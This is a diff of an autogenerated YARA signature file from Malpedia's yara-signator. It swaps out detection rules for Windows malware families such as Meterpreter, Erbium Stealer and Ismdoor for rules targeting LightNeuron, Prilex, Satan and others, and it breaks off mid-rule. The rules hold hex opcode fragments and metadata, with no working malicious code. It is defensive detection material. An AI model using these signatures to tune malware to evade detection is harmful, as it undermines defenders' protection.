@@ -128993,19 +128899,19 @@ rule MALPEDIA_Win_Vx_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45f4 64a300000000 8bf1 8b1d???????? c70600000000 c7461400000000 85db }
-		$sequence_1 = { 8b0d???????? 8bd3 ff7608 6a32 50 }
-		$sequence_2 = { e9???????? d9ee 84cd 0f84d2ae0000 d9e0 e9???????? ddd8 }
-		$sequence_3 = { a1???????? 833c0700 7518 6a28 e8???????? 8b0d???????? 83c404 }
-		$sequence_4 = { 8b45b8 03c0 c78540fdffff07000000 6889000000 }
-		$sequence_5 = { 8bca c1f906 83e23f 6bd238 8b0c8d10df4300 88441129 }
-		$sequence_6 = { 8b048510df4300 f644082801 7406 8b440818 5d }
-		$sequence_7 = { 8b4ddc 8b45e8 8b0c8d10df4300 f644082804 7416 8a45ec }
-		$sequence_8 = { 55 8bec 8b4510 56 8b750c 8b0e 3b0c8514e24300 }
-		$sequence_9 = { 68e0070000 57 e8???????? ffb5d8f7ffff eb0c 68e0070000 }
+		$sequence_0 = { ebc4 395dc4 7515 8b4594 83c0c8 50 8d4580 }
+		$sequence_1 = { 83781410 897810 7202 8b00 c60000 39bb3c020000 }
+		$sequence_2 = { 7403 33db 43 899fd4010000 6a01 33ff 8d750c }
+		$sequence_3 = { 53 8d45c4 33ff 50 895dfc 47 6802000080 }
+		$sequence_4 = { 7477 03fe 57 8d857cffffff 50 53 e8???????? }
+		$sequence_5 = { 68???????? 50 e8???????? 83c410 8d45d0 50 e8???????? }
+		$sequence_6 = { 6a00 8bd0 8d8c24b0000000 c684245c01000005 e8???????? 53 33ff }
+		$sequence_7 = { 837f1410 7202 8b3f 8d442450 50 57 e8???????? }
+		$sequence_8 = { 8d7dd0 a5 a5 a5 a5 8b75f0 8bfb }
+		$sequence_9 = { 837f1410 7204 8b07 eb02 8bc7 8d3418 56 }
 
 	condition:
-		7 of them and filesize < 550912
+		7 of them and filesize < 376832
 }
 rule MALPEDIA_Win_Devilstongue_Auto : FILE
 {
@@ -129046,18 +128952,18 @@ rule MALPEDIA_Win_Devilstongue_Auto : FILE
 	condition:
 		7 of them and filesize < 990208
 }
-rule MALPEDIA_Win_Dusttrap_Auto : FILE
+rule MALPEDIA_Win_Lightneuron_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dc8c0b6-03e4-543a-8235-ad282f751715"
+		id = "effcdfe2-a4bd-534e-86eb-84be08a02b5f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dusttrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dusttrap_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightneuron_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "99d0157bbc57f142e4b3ca02f7a6fc667dbe8aaf793dc492ed4ef3b4577c5d17"
+		logic_hash = "6ad51552136a32b2e5f3fef922b412240ca64bebb497b163d34faf6af2a9c320"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129071,32 +128977,32 @@ rule MALPEDIA_Win_Dusttrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4133c0 c1e008 33c2 4389848c40ec0200 c1c008 }
-		$sequence_1 = { 492bf4 75a9 488b9c24b80a0000 488bbc24a80a0000 4c8bbc24980a0000 4c8bac24a00a0000 488bb424b00a0000 }
-		$sequence_2 = { 478b9c8240dc0200 48c1e918 45339c9240e80200 41c1ef08 410fb6d7 4c8d3d5257ffff 45339c8a40d80200 }
-		$sequence_3 = { 4c8bf9 33d2 488b0d???????? 8bf5 488b89f8000000 e8???????? }
-		$sequence_4 = { 488bbc24a80a0000 4c8bbc24980a0000 4c8bac24a00a0000 488bb424b00a0000 4d85f6 743f 488b0d???????? }
-		$sequence_5 = { e8???????? 8bf0 85c0 0f85f4000000 0f57c0 }
-		$sequence_6 = { 498d4e30 4533c0 baa00f0000 e8???????? 488b05???????? 4c8d0539810100 488bd5 }
-		$sequence_7 = { 448bf6 4903df 4981c600ffffff 33d2 41b820030000 4c03f3 e8???????? }
-		$sequence_8 = { 89442420 488b8988010000 448d4204 e8???????? 488b0d???????? 488d8424d0000000 48896c2458 }
-		$sequence_9 = { 488b4108 488d4908 488902 488d5208 }
+		$sequence_0 = { 488b0d???????? 4885d2 480f45ca ff15???????? 488b4b08 8d5001 e8???????? }
+		$sequence_1 = { 448830 e8???????? 85c0 744e 488bcb e8???????? 41ffc4 }
+		$sequence_2 = { 488bd3 4c0f45c8 488b05???????? 488bcf 4885c0 4c0f45c0 e8???????? }
+		$sequence_3 = { c744244801000000 85ff 0f8598080000 488b8c24d8000000 4883f901 7304 33c0 }
+		$sequence_4 = { 2bd8 78ef 4863db 488bd5 4803de 488bcb }
+		$sequence_5 = { e8???????? 488bc7 41be01000000 458d4603 33d2 488bcf 4c89742470 }
+		$sequence_6 = { 4883ec38 488b4c2440 ff15???????? 89442420 837c2420ff 7507 }
+		$sequence_7 = { 4885ed 7437 4885c0 7432 488d7501 483bf0 7729 }
+		$sequence_8 = { 0fb6c8 410fb6c1 339c8dc0e90300 339c8580d50300 418bc1 41c1e910 41335d04 }
+		$sequence_9 = { 4c89742428 4489742420 e8???????? 418bee 488b05???????? 488b15???????? }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Makloader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_104_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26ebb112-b6ed-51a4-bad8-c324e66e4906"
+		id = "22cbe35d-f38f-5d67-9ed1-a6824dbbad6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makloader_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_104_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "854a6b1744de222da9ac653a892bbe0900bac42ce1325f6f01c3e73dc26cfb28"
+		logic_hash = "7237a55b9f406cfa347ef2bcf70f76cf7dbf15c7062684d829227ca0ac28ac39"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129110,32 +129016,32 @@ rule MALPEDIA_Win_Makloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bca00 8b440dbc 8b540dc0 b127 }
-		$sequence_1 = { c7857cebffff00000000 c78580ebffff00000000 8d8554e5ffff 898584ebffff c78588ebffff00000000 8d8d74ebffff }
-		$sequence_2 = { 33d2 8b45fc 83c003 8810 8b45fc 8be5 }
-		$sequence_3 = { a1???????? 33c5 8945fc c745c000100000 }
-		$sequence_4 = { 8b94d530fdffff b103 e8???????? 0bd8 8b8520fdffff 0bc2 33f3 }
-		$sequence_5 = { e8???????? 8818 ebbf 6a09 8b4df8 83c101 e8???????? }
-		$sequence_6 = { 8b540dc0 b122 e8???????? 8bd8 }
-		$sequence_7 = { 89856ce6ffff 33d2 899514e5ffff 899518e5ffff }
-		$sequence_8 = { 8b08 8b55cc 52 8b410c }
-		$sequence_9 = { 884130 ba01000000 6bc230 8b4d08 0fb61401 52 8b4dfc }
+		$sequence_0 = { 488b7910 488bd9 488bcf 4c8bf2 e8???????? ba20000000 498bce }
+		$sequence_1 = { 488bf9 498bd8 488d4c2420 e8???????? 41b804000000 488d4c2450 488bd3 }
+		$sequence_2 = { 48897e10 48897e18 0f1000 0f1106 0f104810 0f114e10 48897810 }
+		$sequence_3 = { 8bda e8???????? 4885c0 750d e8???????? 33c0 4883c420 }
+		$sequence_4 = { 4c8bb42490000000 498b86a0000000 4803c1 4c03d8 4933d3 4c895c2408 4c8bda }
+		$sequence_5 = { 4933ca 4c8b942490000000 498b82a8000000 4803c1 4c03c0 4933d0 }
+		$sequence_6 = { cc e8???????? 4d8d4601 488bd6 498bcf e8???????? 48891e }
+		$sequence_7 = { 41c1ea19 4433d0 4403742408 4503e2 8b442404 4133dc }
+		$sequence_8 = { e8???????? 4439b59c000000 7413 e9???????? ff15???????? cc 4489b59c000000 }
+		$sequence_9 = { 49c1e820 4c33c2 488b542420 4903d0 4c33ca 498bc9 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Meterpreter_Auto : FILE
+rule MALPEDIA_Win_Prilex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6f1771a-05aa-5edf-806e-8f4646e6de38"
+		id = "ddf38178-7ef1-5c36-b125-6bf3f451e7fb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meterpreter_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prilex_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "b31b408f14a6efeb814ec89850c20aeb2f6b49daa7fba766082bcbe19d74b589"
+		logic_hash = "fbaec0a907818a5c45443c868d80b924ff651b8b9668a983a8d7f07c1fa9a7e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129149,32 +129055,32 @@ rule MALPEDIA_Win_Meterpreter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7b5d c7400800000000 8b561c c7420c00000000 }
-		$sequence_1 = { c07d14eb 8b542472 8cd0 f733 ce }
-		$sequence_2 = { 56 e8???????? 85d9 f5 }
-		$sequence_3 = { e04f 1089471c8b8e 48 e600 00ee }
-		$sequence_4 = { 0000 68ffff0000 52 ffd7 8b2410 }
-		$sequence_5 = { 02c0 8bf7 b94c000061 f3ab 8b4573 8b4d0c 8bbdfc89068b }
-		$sequence_6 = { 57 57 897810 57 }
-		$sequence_7 = { 8d919248b299 40 93 49 722f }
-		$sequence_8 = { 8b3c87 1485 c9 896375 8b3b }
-		$sequence_9 = { d040f3 27 c0eb80 d440 0075cc b8???????? }
+		$sequence_0 = { 8d4ddc ff15???????? 8d4dcc ff15???????? 8d55c4 52 6a00 }
+		$sequence_1 = { 8d4db0 50 51 8975b0 e8???????? 8b55e8 }
+		$sequence_2 = { c785d4feffff01000000 8b45c4 50 6a01 ff15???????? }
+		$sequence_3 = { 8b550c 3b32 0f84d4000000 3bf7 0f84cc000000 8d55b8 }
+		$sequence_4 = { ff15???????? 50 8b45e0 8d4ddc 50 }
+		$sequence_5 = { 8bf0 ff15???????? 8d45c8 8d4dcc 50 51 }
+		$sequence_6 = { 33c0 833a00 0f95c0 0bc8 85c9 7538 c745fc03000000 }
+		$sequence_7 = { 51 e8???????? 8945d0 c745fc04000000 66c785f8feffff0000 8d95f8feffff }
+		$sequence_8 = { 8d8dacfdffff 68???????? 52 898d54fdffff c7854cfdffff08400000 }
+		$sequence_9 = { 8b542428 33c0 89442414 53 8944241c 33c9 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Ismdoor_Auto : FILE
+rule MALPEDIA_Win_Pubload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "540e8392-0220-5703-98ef-e8f75cf1cca1"
+		id = "eb3eb2a3-33cb-52f0-8b9b-1e92524c642b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ismdoor_auto.yar#L1-L153"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pubload_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "0347b8b3605f80aa046ee397578be54423bd20b2d0f0c466e85204c8c4819aa8"
+		logic_hash = "cbebb262e4f807799c3d6fba9199253493785b2d8970bb9dd2ccb71611e2a01f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129188,37 +129094,32 @@ rule MALPEDIA_Win_Ismdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 }
-		$sequence_1 = { 488bd6 488bcb ff5048 4885c0 750e }
-		$sequence_2 = { 7419 488d4dc0 e8???????? 483bd8 7405 }
-		$sequence_3 = { 448bc3 4963c0 4585c0 7514 }
-		$sequence_4 = { 90 c685200100006b 4c89bd38010000 4c89bd40010000 48c7854001000007000000 }
-		$sequence_5 = { 488d4c2448 e8???????? 90 4c8d45f0 488bd0 }
-		$sequence_6 = { 488b45b8 48898310020000 48898318020000 48898320020000 }
-		$sequence_7 = { e9???????? 4532ed 488d8db0010000 e8???????? }
-		$sequence_8 = { eb02 33c0 8bbdccfbffff 6bc009 0fb6bc38107a4700 8bc7 }
-		$sequence_9 = { e8???????? 83f8ff 7e3c ff75ec }
-		$sequence_10 = { 52 50 e8???????? 68e8030000 ffd6 }
-		$sequence_11 = { c645fc3f e9???????? 6a00 68???????? }
-		$sequence_12 = { c785f0fdffff00000000 50 6a00 6a00 6a1d 8bf1 }
-		$sequence_13 = { 46 83fe10 7cdb ff75d0 8d55e8 }
-		$sequence_14 = { 8bc8 eb0c 0fb6c0 0fbe8040714800 03c8 }
+		$sequence_0 = { e8???????? 83c408 33c9 68???????? 66894802 }
+		$sequence_1 = { ff15???????? 68???????? 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_2 = { 6804010000 68???????? 6a00 ff15???????? 6a5c }
+		$sequence_3 = { ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 68???????? }
+		$sequence_4 = { 83c408 33c9 68???????? 66894802 ff15???????? }
+		$sequence_5 = { 6803001f00 ff15???????? 85c0 7408 6a00 ff15???????? 68???????? }
+		$sequence_6 = { 68???????? 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_7 = { 68???????? 6a00 ff15???????? 6a5c 68???????? e8???????? 83c408 }
+		$sequence_8 = { 68???????? e8???????? 83c408 33c9 68???????? }
+		$sequence_9 = { 6a00 6a00 6a00 ff15???????? c3 }
 
 	condition:
-		7 of them and filesize < 1933312
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Reaver_Auto : FILE
+rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7725038c-885d-586e-9f95-5e06e196979a"
+		id = "fb336c30-936c-5161-8554-4fa39d727895"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reaver_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_mailsniffer_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "83dafe6f8435f2ac84b6d9a74f3f9ba4ae0b3ddc0578ba5a08e90d4a03423ef1"
+		logic_hash = "b88fdb233f08271f4c82945f7e7e3b8d498570e4526ea1a19d24dcafd9d77060"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129232,32 +129133,32 @@ rule MALPEDIA_Win_Reaver_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3d14050000 7504 33c0 c9 c3 }
-		$sequence_1 = { 7453 8d45f4 50 ff7508 6a00 ff15???????? }
-		$sequence_2 = { ff15???????? 85c0 7440 8b45f4 6a00 }
-		$sequence_3 = { ff15???????? 85c0 7453 8d45f4 }
-		$sequence_4 = { 50 ff15???????? 85c0 7453 8d45f4 50 ff7508 }
-		$sequence_5 = { ff15???????? 85c0 740d ff15???????? 3d14050000 7504 33c0 }
-		$sequence_6 = { 85c0 7453 8d45f4 50 ff7508 }
-		$sequence_7 = { 50 ff7508 6a00 ff15???????? 85c0 7440 }
-		$sequence_8 = { 6a00 ff15???????? 85c0 7440 8b45f4 6a00 }
-		$sequence_9 = { 50 c6467430 e8???????? 83c634 }
+		$sequence_0 = { 81ec1c020000 56 6a1c 58 8945f0 c745f4c89d2d01 8945f8 }
+		$sequence_1 = { 0f8486000000 6a10 58 e8???????? 8bf0 85f6 }
+		$sequence_2 = { e8???????? 83c40c 833e00 894608 897e0c 7421 }
+		$sequence_3 = { 8b4508 8b4dec c745f451000000 8908 83ff17 750f }
+		$sequence_4 = { e8???????? 57 68???????? 57 e8???????? 83c424 }
+		$sequence_5 = { 85c0 0f8498010000 8b45f4 8365c800 83c004 }
+		$sequence_6 = { 57 8d85ecfeffff 50 53 8d85b4faffff }
+		$sequence_7 = { ff15???????? ffb424f4040000 ff15???????? 8b8424cc040000 }
+		$sequence_8 = { 83c410 85ff 742c 8b462c ff7608 ff7628 85c0 }
+		$sequence_9 = { 743f 66833f00 7439 56 6a16 8d75e4 58 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Chiser_Client_Auto : FILE
+rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c99b11d6-95f8-5089-bb79-3dcbcddf715f"
+		id = "363fee5b-028a-51bb-ae8e-5e88e615a60a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chiser_client_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_yahoo_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "a4f562ea6b25a50fa272453bc9361d6900c9cafcbad3f751e3aa04995d53620d"
+		logic_hash = "cbf24b20d63128f54b5e31c01d6a0853cc228489290e6c3462d1dc4838163313"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129271,32 +129172,32 @@ rule MALPEDIA_Win_Chiser_Client_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48890a 48894a08 488d4808 e8???????? 488d05a9e30200 488903 488bc3 }
-		$sequence_1 = { 480f40c1 488bc8 e8???????? 488bc8 49890424 }
-		$sequence_2 = { 0f1f440000 418d40fc 460fb61408 418d40fd 460fb61c08 }
-		$sequence_3 = { c744245865007800 c744245c2e006800 c744246074006d00 c74424646c000000 4c89742430 bf01000000 897c2428 }
-		$sequence_4 = { 498b0e 4c8d4110 488d5108 e8???????? 90 488bcb e8???????? }
-		$sequence_5 = { 41b904000000 0f1f440000 b904000000 6666660f1f840000000000 410fb60414 }
-		$sequence_6 = { 488bc5 0f1f00 48ffc0 66833c4100 75f6 83c008 4863f8 }
-		$sequence_7 = { 48636908 488bf1 4c8b7118 b802000000 }
-		$sequence_8 = { 48894320 488d1511f5ffff e8???????? eb09 488bcb ff15???????? 408ac5 }
-		$sequence_9 = { 81ca00000780 85c0 0f4ed0 e8???????? 488d1584aa0100 488d4c2440 }
+		$sequence_0 = { 8d443802 50 e8???????? 56 e8???????? ff750c }
+		$sequence_1 = { ffb69c841e00 ff15???????? 85c0 7506 53 }
+		$sequence_2 = { e8???????? 015d0c 03f3 83c428 }
+		$sequence_3 = { ffb694841e00 ffd3 57 e8???????? 59 }
+		$sequence_4 = { 83ec64 8b4d08 56 57 68???????? 6a01 }
+		$sequence_5 = { e8???????? 6a04 68???????? ff750c ff15???????? }
+		$sequence_6 = { 85c0 0f84b4000000 8d85fcfeffff 56 50 8d85fcfeffff }
+		$sequence_7 = { 8d85c8fdffff 56 50 e8???????? 83c418 }
+		$sequence_8 = { 8b7518 83c414 8d85fcd7ffff 8bcb }
+		$sequence_9 = { b838280000 e8???????? 53 56 }
 
 	condition:
-		7 of them and filesize < 714752
+		7 of them and filesize < 8060928
 }
-rule MALPEDIA_Win_Dropshot_Auto : FILE
+rule MALPEDIA_Win_Satan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "346ce58d-bd06-5f2e-8d2b-941cfe3b7a37"
+		id = "68d44cab-535c-5e80-af20-cc11a23f278f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dropshot_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satan_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e0a96c7028a31f8096e80273f88669f127d961f8172465734bc77ab98df7c7f9"
+		logic_hash = "d0b3d89d021ce91fc4570ebd9fe46022bd9b8c1b3f3581186971725c2d3f1922"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129310,30 +129211,32 @@ rule MALPEDIA_Win_Dropshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a05 ff15???????? ff15???????? 6a00 6a00 6a00 }
-		$sequence_1 = { ff15???????? 5d c3 3b0d???????? f27502 }
-		$sequence_2 = { 6a64 ff15???????? 6800800000 6a00 }
-		$sequence_3 = { e8???????? eb05 e8???????? 68e8030000 ff15???????? }
-		$sequence_4 = { 6a00 6a00 ff15???????? 6a00 6a00 68???????? }
-		$sequence_5 = { ff15???????? 6a04 6800100000 6808020000 }
-		$sequence_6 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 }
-		$sequence_7 = { ff15???????? 6a00 ff15???????? 6a05 ff15???????? ff15???????? }
+		$sequence_0 = { 8b02 c1f806 8b4d0c 8b11 83e23f 6bca30 8b148540e04700 }
+		$sequence_1 = { 8d4db8 c745fcffffffff e8???????? 8d45b8 c745fc10000000 50 8d45e4 }
+		$sequence_2 = { 8945cc c645d300 c745c8ffffffff 83cbff 895dc4 c745d800000000 c745dc00000000 }
+		$sequence_3 = { 3305???????? b904000000 6bd124 8982d0d14700 68???????? 8b45fc 50 }
+		$sequence_4 = { 660f123d???????? 25ff010000 83c001 25fe030000 f20f592c85c01a4700 f20f591485c01a4700 660f5834c5d0224700 }
+		$sequence_5 = { 7511 3d00200000 740a be06000000 33c9 8975c0 894dc8 }
+		$sequence_6 = { f20f5cc3 03c0 03c0 03c0 03c0 660f289800334700 660f2835???????? }
+		$sequence_7 = { c745fc00000000 33c9 8b751c ba02000000 46 8bc6 f7e2 }
+		$sequence_8 = { 8bff 55 8bec 83ec10 8b4508 8d0c8598e24700 51 }
+		$sequence_9 = { e8???????? 8d45b8 c745fc10000000 50 8d45e4 b9???????? 50 }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Pipcreat_Auto : FILE
+rule MALPEDIA_Win_Phantomcore_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff44b514-0bd0-5060-9863-69f45ed3246f"
+		id = "2be56282-528c-5044-bd7b-3727ed618862"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipcreat_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phantomcore"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phantomcore_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8b0c4b69f4a54d875f228245ca03fbe66625db30fecf518efb33a362af79adb3"
+		logic_hash = "ee848610d848563fe98dd89814048251462308bba35e0801488bbe21ef0c4142"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129347,32 +129250,32 @@ rule MALPEDIA_Win_Pipcreat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800100000 50 ff35???????? e8???????? 83c40c 5f }
-		$sequence_1 = { 6a00 8d442420 6a00 50 6a01 6a02 6a20 }
-		$sequence_2 = { 83c418 85c0 7436 56 ff35???????? ff15???????? }
-		$sequence_3 = { 33c0 c3 8b0d???????? 51 ff15???????? }
-		$sequence_4 = { e8???????? 83c40c ff15???????? 6a3f a3???????? 33db }
-		$sequence_5 = { 6a02 6a20 68ff010f00 53 57 52 ffd5 }
-		$sequence_6 = { 40 3b4510 7cf6 ff35???????? ff15???????? 5f 8bc3 }
-		$sequence_7 = { 6a00 57 ff15???????? 83c002 83c408 8bf8 66833f00 }
-		$sequence_8 = { 6a30 6868420010 eb07 6a28 }
-		$sequence_9 = { a5 50 33db ff35???????? a4 ff15???????? }
+		$sequence_0 = { 8d45d0 8d4da8 68???????? 50 e8???????? c745f001000000 8d45c0 }
+		$sequence_1 = { e9???????? 8b16 0f57c0 0f1145c8 83f803 bf03000000 0f42f8 }
+		$sequence_2 = { 8b65e8 83c50c c745f0ffffffff ff75d8 ff15???????? ff75d8 ff15???????? }
+		$sequence_3 = { c78634020000cc734b00 c7864402000018714b00 8d8648020000 50 e8???????? 83c404 c7863402000018714b00 }
+		$sequence_4 = { eb11 8975d8 50 e8???????? 83c404 89c1 8b45d8 }
+		$sequence_5 = { c745c818714b00 8d4dcc c745d000000000 c745cc00000000 c745c026f64b00 c645c401 8d45c0 }
+		$sequence_6 = { c7443a480f000000 c6443a3400 8d1c3a 83c34c 83c74c 39cb 0f8571ffffff }
+		$sequence_7 = { e8???????? 83c410 68???????? 8d852cffffff 50 e8???????? 83c408 }
+		$sequence_8 = { ff431c c7431800000000 c74344e1c94b00 b80e000000 e9???????? c745f0ffffffff 0fb64dac }
+		$sequence_9 = { ff7514 ff74240c 6a01 57 e8???????? 8b0e 8b01 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 1840128
 }
-rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
+rule MALPEDIA_Win_Koiloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b8a0033-eafb-588e-852d-212657477c66"
+		id = "5e4efaa4-8409-52c6-a357-d4b16d12b604"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.erbium_stealer_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koiloader_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "52e0e8033201024664e25bae217264a7d239dc0c23fc20bab4e50f4bf89b0343"
+		logic_hash = "a14056c4d5487fcde976e3de41a707b0de19ece78e34b4f5bb62e5e5638e41ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129386,32 +129289,32 @@ rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f8 ba???????? b926000000 2bd0 }
-		$sequence_1 = { 7409 83c002 66833800 75f7 668b4c2450 6685c9 7418 }
-		$sequence_2 = { 6a04 6800200000 23f0 56 6a00 ff15???????? }
-		$sequence_3 = { ff15???????? 8945bc 68???????? 8b55f4 52 }
-		$sequence_4 = { eb96 6a04 6800300000 6a18 6a00 8b4508 50 }
-		$sequence_5 = { 52 8b4508 50 ff55bc 33c9 }
